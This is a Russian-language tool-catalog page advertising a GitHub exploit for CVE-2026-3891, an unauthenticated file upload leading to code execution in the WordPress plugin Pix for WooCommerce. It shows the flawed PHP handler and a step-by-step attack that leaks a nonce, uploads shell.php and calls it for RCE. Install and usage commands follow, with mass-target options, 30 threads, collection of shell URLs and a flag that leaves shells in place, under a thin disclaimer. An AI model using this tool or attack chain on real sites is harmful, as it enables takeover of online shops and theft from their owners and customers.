Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-3891 — Pix for WooCommerce — Неаутентифицированная загрузка файла через параметр certificate_crt_path | CVSS 9.8 | Kitploit
Инструменты/GitHubGitHub/shinthink/cve-2026-3891
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubshinthink/cve-2026-3891

CVE-2026-3891

Pix for WooCommerce — Неаутентифицированная загрузка файла через параметр certificate_crt_path | CVSS 9.8

Репозиторий
4192 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-3891 — Pix for WooCommerce Unauthenticated File Upload RCE

Утечка Nonce → Загрузка certificate_crt_path → Выполнение кода


Обзор

CVE-2026-3891 — это критическая (CVSS 9.8) уязвимость неавторизованной произвольной загрузки файлов в WordPress-плагине Pix for WooCommerce (от linknacional) версий ≤ 1.5.0.

Обработчик AJAX lkn_pix_for_woocommerce_c6_save_settings имеет:

  1. Отсутствие проверки прав — любой неавторизованный посетитель может его вызвать
  2. Отсутствие проверки типа файла — через параметр certificate_crt_path принимается любое расширение
  3. Действительный nonce свободно получается через конечную точку lkn_pix_for_woocommerce_generate_nonce без аутентификации

Загруженные файлы попадают в веб-доступную директорию /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/.

Затронутые версии

ВерсияСтатус
≤ 1.5.0Уязвима
1.6.0+Исправлена

Обнаружил: Alexis Lafontaine через Wordfence (13 марта 2026)


Механизм уязвимости

Первопричина

// Nonce генерируется без аутентификации
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);

// Обработчик загрузки — нет проверки прав, нет проверки типа файла
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
function c6_save_settings() {
    // Нет проверки current_user_can()
    // Нет вызова wp_check_filetype()
    move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
}

Схема атаки

1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
   → Получить валидный nonce (аутентификация не требуется)
2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
   → Загрузить shell.php через поле certificate_crt_path
3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
   → RCE

Установка

git clone https://github.com/shinthink/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt

Использование

python cve_2026_3891.py -t target.com
python cve_2026_3891.py -f targets.txt -o shells.txt
python cve_2026_3891.py -t target.com --debug --no-cleanup

Аргументы

  -t, --target      Одиночная цель
  -f, --file        Список целей
  -o, --output      Сохранить URL-адреса RCE
  --threads         Количество потоков (по умолчанию: 30)
  --no-cleanup      Оставить шеллы на цели
  --debug           Показывать каждый запрос
  -v, --verbose     Подробный вывод

Отказ от ответственности

ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И АВТОРИЗОВАННЫХ ТЕСТОВ. Авторы не несут ответственности за неправомерное использование.


Ссылки

РесурсСсылка
Уведомление Wordfencewordfence.com
Запись NVDCVE-2026-3891
ИсследовательAlexis Lafontaine

Не связано с linknacional или Pix for WooCommerce.

Скачать инструмент